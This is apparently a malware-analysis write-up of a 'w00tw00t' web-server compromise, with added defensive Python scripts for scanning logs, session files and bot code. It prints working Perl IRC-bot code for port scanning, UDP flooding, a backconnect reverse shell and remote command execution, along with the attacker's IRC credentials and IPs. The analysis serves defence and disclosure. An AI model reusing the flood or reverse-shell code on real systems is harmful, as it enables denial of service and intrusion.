Sun Oct 20 21:23:06 JST 2013|2.228.117.30 |2-228-117-30.ip191.fastwebnet.it.|12874 | 2.224.0.0/13 | FASTWEB | IT | FASTWEBNET.IT | FUTURA ENTERPRISE
Sun Oct 20 21:23:08 JST 2013|46.105.124.119|poc2.polyspot.com. |16276 | 46.105.0.0/16 | OVH | FR | OVH.COM | OVH SYSTEMS
Sun Oct 20 21:23:09 JST 2013|212.227.251.6 |s15378439.onlinehome-server.info.|8560 | 212.227.0.0/16 | ONEANDONE | DE | 1AND1.CO.UK | 1&1 INTERNET AG
Using lynx to check the HTTP status of each server...
$ lynx -head -dump http://197.221.26.250
Looking up 197.221.26.250
Making HTTP connection to 197.221.26.250
Alert!: Unable to connect to remote host.
lynx: Can't access startfile http://197.221.26.250/

$ lynx -head -dump http://2.228.117.30
^C (Time out..)

$ lynx -head -dump http://211.162.16.164
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2013 23:39:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 13 Oct 2013 21:40:12 GMT
ETag: "19958040-9d6-4e8a6323e4700"
Accept-Ranges: bytes
Content-Length: 2518
Connection: close
Content-Type: text/html; charset=UTF-8

$ lynx -head -dump http://58.211.18.184
HTTP/1.1 302 Moved Temporarily
Location: http://58.211.18.184/index.jsp
Content-Type: text/plain
Content-Length: 0
Date: Sun, 20 Oct 2013 12:29:23 GMT
Server: Apache Coyote/1.0
Connection: close

$ lynx -head -dump http://46.105.124.119
HTTP/1.1 404 Not Found
Date: Sun, 20 Oct 2013 12:31:04 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1

$ lynx -head -dump http://212.227.251.6
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2013 12:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
This leaves me with two suspected IPs:
212.227.251.6
211.162.16.164
The first IP, 212.227.251.6, ended up at a cleaned-up site..
GET / HTTP/1.1
Host: 212.227.251.6
User-Agent: BeastMalwareMustDieZilla
Referer: http://malwaremustdie.org
Connection: close

HTTP/1.1 200 OK
Date: Sun, 20 Oct 2013 12:36:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 312
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Pegasus Host | Alojamiento Web</title>
<link rel="Stylesheet" href="ph.css" media="screen" />
</head>

<body>
<img src="./ph.jpg" alt="Image - Pegasus Host" /><br />
página temporal

</body>
</html>
While 211.162.16.164 (thanks to MalMouse for noticing this!) led us to the source of the attack:

In the source:

Let's enlarge the part that shows the source:
Well, this is the source of the attack, a hacked site; I marked the hack files in green. The site itself is full of URL redirections, so I can not call it a clean site, but I will focus on the w00tw00t attack component only:
Connected to 37.1.192.220.
220 FTP Server ready.
Name (37.1.192.220:rik): test
331 Password required for test
Password:
230 User test logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alF
229 Entering Extended Passive Mode (|||1460|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 18 test admin 4096 Sep 2 20:22 /
drwxr-x--x 10 test admin 4096 Oct 13 18:02 ./
drwxr-x--x 10 test admin 4096 Oct 13 18:02 ../
-rw-r--r-- 1 test admin 7 Oct 12 10:51 .codepage
-rw-r--r-- 1 test admin 37287 Oct 13 15:53 .dsf
drwx------ 2 test admin 4096 Aug 24 08:25 bin-tmp/
-rw-r--r-- 1 test admin 10368191 Sep 30 20:27 "blackcat.jpg"
-rw-r--r-- 1 test admin 19609 Oct 1 19:11 "bot.zip"
drwxr-x--x 2 test admin 4096 Aug 7 2012 email/
drwxr-xr-x 2 test admin 4096 Nov 27 2012 etc/
drwxr-xr-x 4 test admin 4096 Nov 26 2012 home/
-rw-r--r-- 1 test admin 2043 Oct 8 08:58 "logclean"
-rw-r--r-- 1 test admin 650 Oct 8 08:58 "logclean.tgz"
drwxrws--- 2 apache admin 757760 Oct 20 14:16 mod-tmp/
-rw-r--r-- 1 test admin 416 Oct 12 09:17 "muhrc"
-rw-r--r-- 1 test admin 37281 Oct 13 16:34 "perl"
drwxr-x--x 2 test admin 4096 Aug 18 11:18 php-bin/
-rw-r--r-- 1 test admin 480699 Oct 13 11:33 "pma.tgz"
-rw-r--r-- 1 test admin 76 Oct 11 10:16 "psybnc.conf"
-rw-r--r-- 1 test admin 130892 Oct 13 18:02 "screen.tar"
-rw-r--r-- 1 test admin 96937 Oct 8 08:56 "test.txt"
lrwxrwxrwx 1 apache admin 7 Aug 7 2012 tmp -> mod-tmp/
-rw-r--r-- 1 test admin 3623 Sep 30 12:30 "unrealircd.conf"
-rw-r--r-- 1 test admin 84852 Oct 13 18:01 "vuln.txt"
-rw-r--r-- 1 test admin 37026699 Oct 6 13:12 "vulnmare"
drwxr-x--x 11 test admin 4096 Sep 15 13:00 www/
-rw-r--r-- 1 test admin 5323 Oct 12 14:29 "x.pl"
-rw-r--r-- 1 test admin 11934 Oct 7 19:19 "xvuln.txt"
226 Transfer complete
And yes, I grabbed them all..

Threat Components..

The files below are the list and log used for the w00tw00t attack:

-rw-r--r--   1 test     admin       84852 Oct 13 18:01 "vuln.txt"
-rw-r--r-- 1 test admin 37026699 Oct 6 13:12 "vulnmare"
-rw-r--r-- 1 test admin 11934 Oct 7 19:19 "xvuln.txt"
And the file below is the w00tw00t attack script itself:
-rw-r--r--   1 test     admin        5323 Oct 12 14:29 "x.pl"
These files are the set of hacking tools injected into this site:
-rw-r--r--   1 test     admin         650 Oct  8 08:58 "logclean.tgz"
-rw-r--r-- 1 test admin 480699 Oct 13 11:33 "pma.tgz"
-rw-r--r-- 1 test admin 130892 Oct 13 18:02 "screen.tar"
-rw-r--r-- 1 test admin 19609 Oct 1 19:11 "bot.zip"
-rw-r--r-- 1 test admin 10368191 Sep 30 20:27 "blackcat.jpg"
-rw-r--r-- 1 test admin 37281 Oct 13 16:34 "perl"

PS: blackcat.jpg is actually a GZIP archive, as its file metadata shows:
Ziped component #0
Compression Deflated
ExtraFlags (none)
Flags (none)
ModifyDate 2009:10:15 03:21:19-07:00
4 years, 5 days, 4 hours, 31 minutes, 25 seconds ago
OperatingSystem Unix
File Size 9.9 MB
File Type GZIP
MIME Type application/x-gzip

Peeling the Code: w00tw00t Attack Script - x.pl

Written in pure Perl, the script is used to pwn web servers running vulnerable PHP: it injects and then extracts all of the "package" files onto the compromised server, and then connects the server to the "master" via an IRC channel. Below is the breakdown of the code shown in the image. The Perl modules it uses:

#!/usr/bin/perl

# MODULES

#use warnings;
use Parallel::ForkManager;
use IO::Socket;
use URI::_foreign;
use URI::_generic;
use URI::_query;
require URI::_foreign;
use URI;
use LWP;
use LWP::Simple;
use LWP::UserAgent;
use LWP::Protocol::http;
use URI::http;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
use HTTP::Headers;
use HTML::Parser;
use Parallel::ForkManager;
use IO::Socket;
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
use HTTP::Headers;
use Getopt::Long;
use Time::HiRes qw(gettimeofday);
use MIME::Base64;
How the User-Agent, timeout, payload and shell are defined:
#use strict;
my $ua = LWP::UserAgent->new(agent =>"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20);
my $hostfile="vuln.txt";
my $word=".dsf";
my $maximumprocess="50";
my $hiddenprocess='/usr/sbin/sshd ';
my $eth="eth0";
my $spd='7';
my $scanclassb;
my $scanclassa;
my $explhost;
my $explpayhost;
my $explpayloadfile;
This is where the exploitation options and their components are defined:
GetOptions(
'exploit|x' => \&exploit,
'h|hostfile=s' => \$hostfile,
'p|paths=s' => \$word,
't|threads=s' => \$maximumprocess,
'help' => \&usage,
'hide=s' => \$hiddenprocess,
'b=s' => \$scanclassb,
'a=s' => \$scanclassa,
'i=s' => \$eth,
'spd=s' => \$spd,
'r' => \&rev,
'host=s' => \$explpayhost,
'clean|sterge' => \&sterge,
The ATTACK logic of #w00tw00t used in this attack is very simple...

With some error trapping and.. they're not very friendly to their users...

Here's the main exploit function; note the extraction of the PMA hacking tools to pwn the server:


Finally the scan, with the PMA toolkit activated.. and the deletion of the extracted toolkit components..
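From the defender's side, the two things the script above leaves in a web server's access log are its hard-coded User-Agent string and a burst of guessed paths from one client. The following is an added example (not code from the original post) that looks for both in Apache combined-format log lines; the log lines, IP addresses and paths are constructed for the example, only the User-Agent string is quoted from x.pl.

```python
import re
from collections import defaultdict
from datetime import datetime

# The User-Agent string hard-coded in x.pl (quoted from the script above).
SCANNER_UA = ("Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) "
              "Opera 7.01 [en]")

# Apache/nginx "combined" format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample access-log lines (documentation IPs, made-up paths; not
# taken from the page).  One client walks several admin-panel paths within a
# couple of seconds using the scanner's UA; the other is an ordinary visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Oct/2013:18:01:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
203.0.113.7 - - [13/Oct/2013:18:01:02 +0000] "GET /pma/ HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
203.0.113.7 - - [13/Oct/2013:18:01:03 +0000] "GET /myadmin/ HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
203.0.113.7 - - [13/Oct/2013:18:01:03 +0000] "GET /mysql/ HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
203.0.113.7 - - [13/Oct/2013:18:01:04 +0000] "GET /phpMyAdmin/ HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
198.51.100.20 - - [13/Oct/2013:18:02:10 +0000] "GET /index.html HTTP/1.1" 200 3421 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/24.0"
198.51.100.20 - - [13/Oct/2013:18:02:11 +0000] "GET /style.css HTTP/1.1" 200 812 "http://www.example.com/index.html" "Mozilla/5.0 (X11; Linux x86_64) Firefox/24.0"
"""


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["status"] = int(e["status"])
        e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append(e)
    return entries


def find_scanner_hits(entries):
    """Exact match on the scanner's User-Agent: cheap, but trivially changed by the attacker."""
    return [e for e in entries if e["ua"] == SCANNER_UA]


def find_probe_bursts(entries, window_seconds=10, min_misses=3):
    """Behavioural signal independent of the UA: one client collecting several
    distinct 404s within a short window.  Returns {ip: sorted 404'd paths}."""
    by_ip = defaultdict(list)
    for e in entries:
        if e["status"] == 404:
            by_ip[e["ip"]].append(e)
    bursts = {}
    for ip, misses in by_ip.items():
        misses.sort(key=lambda e: e["time"])
        for i, first in enumerate(misses):
            paths = {m["path"] for m in misses[i:]
                     if (m["time"] - first["time"]).total_seconds() <= window_seconds}
            if len(paths) >= min_misses:
                bursts[ip] = sorted(paths)
                break
    return bursts


def hits_after_probes(entries, bursts):
    """Which guesses actually landed (2xx) for the clients that were probing."""
    out = defaultdict(list)
    for e in entries:
        if e["ip"] in bursts and 200 <= e["status"] < 300:
            out[e["ip"]].append(e["path"])
    return dict(out)


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    bursts = find_probe_bursts(entries)
    print("UA matches:", len(find_scanner_hits(entries)))
    print("probe bursts:", bursts)
    print("landed:", hits_after_probes(entries, bursts))
```

The 2xx-after-probing check is the one worth alerting on: a scanner that only collects 404s is noise, while a 200 on a guessed admin path from the same client is the moment the server has something to answer with.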

Post #w00tw00t pwned..(1) The Evil Redirection Service

This is the main concept of the attack, explaining WHY this server has so many "weird" redirections.
The server itself was pwned and became the host of an evil redirection service, as one of the directories below shows:

ftp> cd bin-tmp/
250 CWD command successful
ftp> ls -alF
229 Entering Extended Passive Mode (|||49723|)
150 Opening ASCII mode data connection for file list
drwx------ 2 test admin 4096 Aug 24 08:25 ./
drwxr-x--x 10 test admin 4096 Oct 13 18:02 ../
-rwx------ 1 test admin 4564 Jun 15 2007 cgi.php*
-rw------- 1 test admin 198 Aug 24 08:22 sess_02b1133c97f1cfe501c49939044db715
-rw------- 1 test admin 233 Aug 24 08:23 sess_09e938787c74a1345b62c0cddb6e7ffb
-rw------- 1 test admin 0 Aug 24 08:23 sess_0ea5482947611be5265c62949367ac1c
-rw------- 1 test admin 203 Aug 24 08:24 sess_103115f99c01d5a2f99a000c17e413c2
-rw------- 1 test admin 0 Aug 24 08:23 sess_145adf08b9432c2884dd4f174ebeb7d3
[...]
Inside the session or redirection:
"Disney??"
$ cat sess_02b1133c97f1cfe501c49939044db715
mobile_disable|i:0;mobile_enable|i:0;dle_user_id|i:0;dle_password|s:0:"";referrer|s:107:"/filmy/multfilmy/800-sbornik-multfilmov-uolta-disneya-zabavnye-melodii-silly-symphony-1931-1937-dvdrip.html";

"AntiVirus??"
$ cat sess_0b7d8l6ha6m4o0dedbkimdmhe4
mobile_disable|i:0;mobile_enable|i:0;referrer|s:73:"/bezopasnost/antivirus/1151-kiskav-2011-sbros-triala-trial-reset-new.html";
Format of the redirection itself:
mobile_disable|i:0;
mobile_enable|i:0;
dle_user_id|s:4:"3405";
dle_password|s:32:"ed7603cfd1904e27a05a53718a464eed";
member_lasttime|s:10:"1381781518";
referrer|s:42:"/index.php?subaction=userinfo&user=barmost";
A simple grep to extract all the redirections:
$ cat *|grep -E -i -o "\/[a-z0-9]{1,}\/[a-z0-9]{1,}\/[a-z0-9\-]{1,}.html"
/filmy/multfilmy/800-sbornik-multfilmov-uolta-disneya-zabavnye-melodii-silly-symphony-1931-1937-dvdrip.html
/igry/avtosimulyatory/14638-18-stalnyh-koles-ekstremalnye-dalnoboyschiki-2-18-wheels-of-steel-extreme-trucker-2-2011-rus-repack-ot-fenixx.html
/filmy/dokumentalnye/29022-freddie-mercury-the-great-pretender-freddi-merkyuri-velikiy-pritvorschik-2012-hdtv.html
/soft/grafika/25607-domashnyaya-fotostudiya-521-portable-by-samdel.html
/soft/utility/1194-connectify-pro-32022201.html
/soft/grafika/1207-cover-expert-20527-repack-3d-modelirovanie.html
/music/pop/29049-dancing-planet-vol-3-2013.html
/music/pop/29050-zarubezhnyy-svezhachok-2-2013.html
/filmy/uzhasy/26232-tehasskaya-reznya-benzopiloy-3d-texas-chainsaw-3d-2013-bdrip-avc.html
/soft/grafika/14107-face-off-max-3456.html
/music/shanson/29051-va-bezdna-letnego-shansona-versiya-4-2013.html
/music/classic/29039-va-vivaldi-genii-klassicheskoy-muzyki-2012-alac.html
/music/rock/29023-deep-purple-wacken-2013-2013-hdtv.html
/music/rock/29038-ddt-rozhdennyy-v-sssr-2004-dvd5.html
/filmy/dokumentalnye/7509-russkie-sensacii-vip-s-bolshoy-dorogi-efir-24032012-satrip.html
/music/pop/29021-va-80s-dance-deluxe-collection-2013-mp3.html
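The sess_* files are PHP session files written by PHP's default "php" session serializer, so they can be parsed instead of grepped. The grep above only catches paths ending in .html, while the format example shows a referrer of /index.php?subaction=userinfo&user=barmost that such a grep would miss. The following is an added example (not the post's own tooling) that parses the serialized key|value pairs by their declared lengths and pulls out every referrer; the sample session contents are constructed from the three session bodies quoted above, and the file names are illustrative.

```python
import os

# PHP's "php" session serializer writes key|value pairs, where value is
# serialize() output: i:<int>;  s:<len>:"<str>";  b:<0|1>;  d:<float>;  N;
# <len> is a byte count, so files are read as latin-1 (1 byte == 1 char).

# Constructed sample: three session files modelled on the sess_* files listed
# above (the first two reuse the contents quoted on the page, the third the
# "format of the redirection" example).  File names are illustrative.
SAMPLE_SESSIONS = {
    "sess_02b1133c97f1cfe501c49939044db715":
        'mobile_disable|i:0;mobile_enable|i:0;dle_user_id|i:0;dle_password|s:0:"";'
        'referrer|s:107:"/filmy/multfilmy/800-sbornik-multfilmov-uolta-disneya-'
        'zabavnye-melodii-silly-symphony-1931-1937-dvdrip.html";',
    "sess_0b7d8l6ha6m4o0dedbkimdmhe4":
        'mobile_disable|i:0;mobile_enable|i:0;'
        'referrer|s:73:"/bezopasnost/antivirus/1151-kiskav-2011-sbros-triala-trial-reset-new.html";',
    "sess_constructed_example":
        'mobile_disable|i:0;mobile_enable|i:0;dle_user_id|s:4:"3405";'
        'dle_password|s:32:"ed7603cfd1904e27a05a53718a464eed";'
        'member_lasttime|s:10:"1381781518";'
        'referrer|s:42:"/index.php?subaction=userinfo&user=barmost";',
}


def _parse_value(data, pos):
    """Parse one serialize()d scalar starting at data[pos]; return (value, next_pos)."""
    t = data[pos]
    if t == "N":                                  # N;
        return None, pos + 2
    if t in "ibd":                                # i:42;  b:1;  d:0.5;
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        conv = {"i": int, "b": lambda v: v == "1", "d": float}[t]
        return conv(raw), end + 1
    if t == "s":                                  # s:<len>:"<bytes>";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        if data[colon + 1] != '"':
            raise ValueError("malformed string at offset %d" % pos)
        start = colon + 2
        value = data[start:start + length]
        # The declared length decides where the string ends, so a '|' or ';'
        # inside a referrer cannot confuse the parser (a naive split() would).
        if data[start + length:start + length + 2] != '";':
            raise ValueError("string length mismatch at offset %d" % pos)
        return value, start + length + 2
    raise ValueError("unsupported type %r at offset %d" % (t, pos))


def parse_php_session(data):
    """Turn a session body into {key: value}."""
    data = data.strip()
    fields, pos = {}, 0
    while pos < len(data):
        bar = data.index("|", pos)
        key = data[pos:bar]
        fields[key], pos = _parse_value(data, bar + 1)
    return fields


def extract_referrers(sessions):
    """[(file name, referrer)] for every session that carries a referrer."""
    found = []
    for name, body in sorted(sessions.items()):
        ref = parse_php_session(body).get("referrer")
        if ref:
            found.append((name, ref))
    return found


def load_session_dir(path):
    """Read every sess_* file in a directory (e.g. the bin-tmp/ above) as latin-1."""
    sessions = {}
    for name in os.listdir(path):
        if name.startswith("sess_"):
            with open(os.path.join(path, name), encoding="latin-1") as fh:
                sessions[name] = fh.read()
    return sessions


if __name__ == "__main__":
    for name, ref in extract_referrers(SAMPLE_SESSIONS):
        print(name, "->", ref)
```

Run against a real directory with `extract_referrers(load_session_dir("bin-tmp"))`; the session IDs and the dle_* keys (DataLife Engine) tell you which CMS the redirected visitors came from, which is useful when tracing the upstream compromised sites.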
If you look inside the cgi.php file itself, it is a PHPShell v1.7:

Post #w00tw00t pwned..(2) The Network Attack Tool (Portscanner, DDoS, etc)

Not a surprise anymore to find an attack tool in a case like this; it seems to be part of the package actually. Below is the snippet of code used for the attack (the snipped code was cut and modified, so it is "neutralized"). File:

-rw-r--r--   1 test     admin       37281 Oct 13 16:34 perl
(this is a copy of the file below, made by the main script itself)
-rw-r--r-- 1 test admin 37287 Oct 13 15:53 .dsf
Below are the evil code snippets, for PoC purposes:

The Port Scanner:

# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

# Quick scan
if ($funcarg =~ /^ps (.*)/) {
my $hostip="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Portscanning\003\002: $1 \002\00312Ports:\003\002 default");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>'tcp', Timeout => $portime);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 ");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[x]\0034 No open ports found on\002 $1");
[...]
The "Nmap"(?)
# NMAP, lol
elsif ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/)
{
my $hostname="$1";
my $portstart = "$2";
my $portend = "$3";
my (@abertas, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312xMap Portscanning\003\002: $1 \002\00312Ports:\003\002 $2-$3");
foreach my $porta ($portstart..$portend)
{
my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto =>'tcp', Timeout => $portime);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($xstats) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open"); }}}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Scan Complate\003\002");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\00312No ports found..\002"); }}
[...]
UDP Flood:
[...] elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta = "$2";
my $tempo = "$3";
my $pacote;
my $pacotese;
my $fim = time + $tempo;
my $pacota = 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Get BOMbs)\003 Attacking\002: $1 - \002Time\002: $tempo"."seconds");
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
}
if ($xstats)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP Complete):\003\002 $1 - \002Send\002: $pacotese"."kb - \002Time\002: $tempo"."seconds");}}
[...]
Backdoor, the "BackConnect"
# Backconnect
elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[x] ->\0034 Injection ...");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
system("cd /tmp/.mrx");
close(STDIN);
close(STDOUT);
close(STDERR);
[...]
Shell..
sub shell {
return unless $shellaccess;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "cd: $1".": No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c >= "$linas_max") {
$c=0;
[...]
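The snippets above carry strings that are characteristic of this family of Perl IRC bots and that a defender can look for in web-writable directories (mod-tmp/, /tmp, upload folders). The following is an added example (not the post's code) of a small string-based scanner: the indicator patterns are taken from the bot source quoted above, a hit requires the IRC plumbing plus at least one attack capability so that an ordinary IRC client script is not flagged, and the two sample sources are constructed for the example (the first reassembles a few lines quoted above, the second is a harmless LWP script).

```python
import os
import re

# Indicator patterns taken from the bot source quoted above, grouped by what
# they tell us.  "irc" alone is not enough (legitimate IRC code exists); a
# verdict needs the IRC plumbing plus at least one attack capability.
INDICATORS = {
    "irc":         [r"PRIVMSG", r"sendraw\(", r"IO::Socket::INET"],
    "portscan":    [r"Portscanning", r"PeerPort\s*=>\s*\$porta"],
    "udpflood":    [r"SOCK_DGRAM", r"sockaddr_in\(\$porta,\s*\$alvo\)"],
    "backconnect": [r"/bin/sh -i", r'open\(STDIN,\s*">&SOCKET"\)'],
    "shell":       [r"\$shellaccess", r"`\$comando 2>&1"],
    "hiding":      [r"@fakeps", r"\$hiddenprocess"],
}
CAPABILITIES = ("portscan", "udpflood", "backconnect", "shell", "hiding")

# Constructed sample: a few lines reassembled from the snippets above.
SAMPLE_BOT_SOURCE = r"""
my @portas=("21","22","23","25","53","80");
if ($funcarg =~ /^ps (.*)/) {
  sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Portscanning\003\002: $1");
  my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>'tcp');
}
elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
  my $shell = "/bin/sh -i";
  open(STDIN, ">&SOCKET");
}
"""

# Constructed sample: a harmless Perl script that should not be flagged.
SAMPLE_BENIGN_SOURCE = r"""
use LWP::UserAgent;
my $ua = LWP::UserAgent->new(timeout => 20);
my $resp = $ua->get("https://example.com/status");
print $resp->decoded_content;
"""


def scan_text(text):
    """{group: [patterns that matched]} for every indicator group that fired."""
    found = {}
    for group, patterns in INDICATORS.items():
        hits = [p for p in patterns if re.search(p, text)]
        if hits:
            found[group] = hits
    return found


def verdict(found):
    caps = [g for g in found if g in CAPABILITIES]
    if "irc" in found and caps:
        return "perl-irc-bot"
    if caps:
        return "suspicious"      # attack code without the IRC control channel
    return "clean"


def scan_tree(root, max_bytes=2_000_000):
    """Walk a directory and return [(path, verdict, groups)] for non-clean files."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    text = fh.read(max_bytes).decode("latin-1")
            except OSError:
                continue
            found = scan_text(text)
            v = verdict(found)
            if v != "clean":
                results.append((path, v, sorted(found)))
    return results


if __name__ == "__main__":
    print(verdict(scan_text(SAMPLE_BOT_SOURCE)), sorted(scan_text(SAMPLE_BOT_SOURCE)))
    print(verdict(scan_text(SAMPLE_BENIGN_SOURCE)))
```

Files named like the ones in the listing ("perl", ".dsf") and archives such as bot.zip should be unpacked before scanning; the patterns are a triage aid for locating copies, not a substitute for a full review of anything found.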

Preview video of the other hack toolkit packages used (evidence of a crime)

I can not discuss the other toolkits found, for I am running out of time to write.. there are so many of them!
But those tools really explain a lot of details on what the MO of the hack action is; you will see many tool-sets with ELF binaries inside, some of them Open Source software being misused for this malicious purpose. To give a good overview of the other tools used, I opened the archives of those hack-tool packages one by one and recorded it in a video for you to view safely:

Who is the attacker?

The attack itself is controlled by a bad actor hidden behind an IRC connection. Below I disclose the IRC configuration used by this case's attacker; it contains the source IRC IP, the user's ID, the IRC channel, and the nicknames/handles used for conducting the attack. It is a check-mate:

-rw-r--r--   1 test     admin         416 Oct 12 09:17 muhrc

$ cat muhrc
nickname = "TaLa";
altnickname = "TaLa";
username = "wait";
realname = "TaLa's juppah ;-)";
password = "make";
listenport = 123456;
awayreason = "so we begin ;)";
servers {
"irc.undernet.org":6667
};
logging = false;
channels = "#hackinganonymous";
connectcmd = "PRIVMSG x@channels.undernet.org : login 37 ZPhxkxzT";
away = "so we begin ;)";
norestricted = true;
#bind = "91.191.173.194";
#bind = "91.191.173.195";

-rw-r--r-- 1 test admin 37281 Oct 13 16:34 perl

[...]

my @admchan=("#mire");

$servidor='91.191.173.194' unless $servidor;


my $xeqt = "!";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"gnome-pty-helper",
"httpd");

my @nickname = ("TeaMrx","fattys","eliter","vxbot","smufen","dual","lee","carro","frida",
"TeaMrx1","TeaMrx0","TeaMrx2","TeaMrx3","TeaMrx4","TeaMrx5","TeaMrx6","TeaMrx7",
"aVe","kmod","kmod2","uselib","raptor","tmpSH","pwned","w00t","DualDuo","Intel",
"AMDPwr","Geforce","Exploit","vx8m0d","indexs","index","index2","index3","index4",
"xQt1","xQt2","xQt3","xQt4","xQt5","xQt6","xQt7","xQt8","xQt9","xQt10","TeaMrxz",
"De","Der","Det","Var","Kam","Dea","Csa","Fbi","Dea","Narko","Gone","Feber","Tull",
"Tundra","st0rms","fLash","TheLight","Nikko","Nikie","Nikkie","daniel","t0nyandr",
"Europa","Fanta","Caroline","speedline","Perf0rm","indexs","dan","educat","catina",
"bindex","hindex","n0rway","myphp","phpvuln","Alarma","GoScan","oslocity","spette",
"Cascam","vSport","vSmotor","vSteam","vSturbo","Turbost","heeman","andy","loundry",
"ranger","Carbon","TypeR","Nozz","phpforum","Nxgas","NinaGirl","Isit","lama","ouch",
"vTeam","vSpot","vCrew","xeQta","Gourl","Vulnx","Hksurl","Greedy","Mrx","counyjail",
"Spourl","Torshov","Oslos","com_xeqt","mowgli","Asus","com_mrx","MrxTeam","arrest",
